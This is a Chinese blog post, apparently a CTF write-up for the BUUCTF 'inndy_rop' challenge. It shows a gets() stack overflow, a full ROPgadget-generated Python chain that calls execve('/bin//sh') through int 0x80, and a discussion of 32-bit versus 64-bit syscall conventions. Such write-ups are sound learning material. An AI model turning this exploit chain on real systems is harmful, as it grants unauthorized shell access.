[BUUCTF]inndy_rop 杂谈、32位与64位系统调用、与思考

最新推荐文章于 2024-04-28 12:30:16 发布

Tokameine

最新推荐文章于 2024-04-28 12:30:16 发布

阅读量534

点赞数 2

文章标签： ctf

本文链接：https://blog.csdn.net/Tokameine/article/details/120168519

版权

总之先从题目开始看吧，是一道非常简单但却让我长见识的题......

int overflow()
{
  char v1[12]; // [esp+Ch] [ebp-Ch] BYREF

  return gets(v1);
}

明显的栈溢出，且程序基本没有特别的保护，正常构造rop链即可拿到shell

主要是想拓展一下系统调用与一个简单的获取ROP方法

ROPgadget --binary rop --ropchain

ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets

	[+] Gadget found: 0x8050cc5 mov dword ptr [esi], edi ; pop ebx ; pop esi ; pop edi ; ret
	[+] Gadget found: 0x8048433 pop esi ; ret
	[+] Gadget found: 0x8048480 pop edi ; ret
	[-] Can't find the 'xor edi, edi' gadget. Try with another 'mov [r], r'

	[+] Gadget found: 0x805466b mov dword ptr [edx], eax ; ret
	[+] Gadget found: 0x806ecda pop edx ; ret
	[+] Gadget found: 0x80b8016 pop eax ; ret
	[+] Gadget found: 0x80492d3 xor eax, eax ; ret

- Step 2 -- Init syscall number gadgets

	[+] Gadget found: 0x80492d3 xor eax, eax ; ret
	[+] Gadget found: 0x807a66f inc eax ; ret

- Step 3 -- Init syscall arguments gadgets

	[+] Gadget found: 0x80481c9 pop ebx ; ret
	[+] Gadget found: 0x80de769 pop ecx ; ret
	[+] Gadget found: 0x806ecda pop edx ; ret

- Step 4 -- Syscall gadget

	[+] Gadget found: 0x806c943 int 0x80

- Step 5 -- Build the ROP chain

	#!/usr/bin/env python2
	# execve generated by ROPgadget

	from struct import pack

	# Padding goes here
	p = ''

	p += pack('<I', 0x0806ecda) # pop edx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080b8016) # pop eax ; ret
	p += '/bin'
	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806ecda) # pop edx ; ret
	p += pack('<I', 0x080ea064) # @ .data + 4
	p += pack('<I', 0x080b8016) # pop eax ; ret
	p += '//sh'
	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806ecda) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x080492d3) # xor eax, eax ; ret
	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x080481c9) # pop ebx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080de769) # pop ecx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x0806ecda) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x080492d3) # xor eax, eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0807a66f) # inc eax ; ret
	p += pack('<I', 0x0806c943) # int 0x80

‘--ropchain’参数能够直接生成一条rop链来get shell

其具体的构造方式不必细究，实际上笔者在写rop的时候也肯定不会这样写，不过结论来说，只需要加上合适的偏移就能在本题中直接拿到shell，倒是非常方便

然后是本篇的正文：

在阅读了其生成的ROP链之后，笔者好奇地搜了一下是否有“syscall”指令，因为上述是通过“int 0x80”来陷入内核的，那为什么不用syscall呢？

参考本贴：https://www.cnblogs.com/Max-hhg/articles/14266574.html

两者的差异只有传参规则、指令与调用号不同而已

32位：EBX、ECX、EDX、ESI、EDI、EBP

64位：RDI、RSI、RDX、R10、R8、R9

而在32位系统中使用 “int 0x80”，而64位系统中使用“syscall”，仅此而已的差别

后话：

本来有点好奇，“为什么32位程序里会出现syscall指令”，后来对着IDA找汇编指令才发现，ROPgadget识别到的syscall在IDA里连对应的地址都找不到。

实际上就是把原本的指令字节分割一下，然后单独取出能被当作syscall的字节

嘛......这么来看还怪没有意义的......

Tokameine

关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[BUUCTF]inndy_rop 杂谈、32位与64位系统调用、与思考

总之先从题目开始看吧，是一道非常简单但却让我长见识的题......int overflow(){ char v1[12]; // [esp+Ch] [ebp-Ch] BYREF return gets(v1);} 明显的栈溢出，且程序基本没有特别的保护，正常构造rop链即可拿到shell 主要是想拓展一下系统调用与一个简单的获取ROP方法ROPgadget --binary rop --ropchainROP chain...
复制链接

扫一扫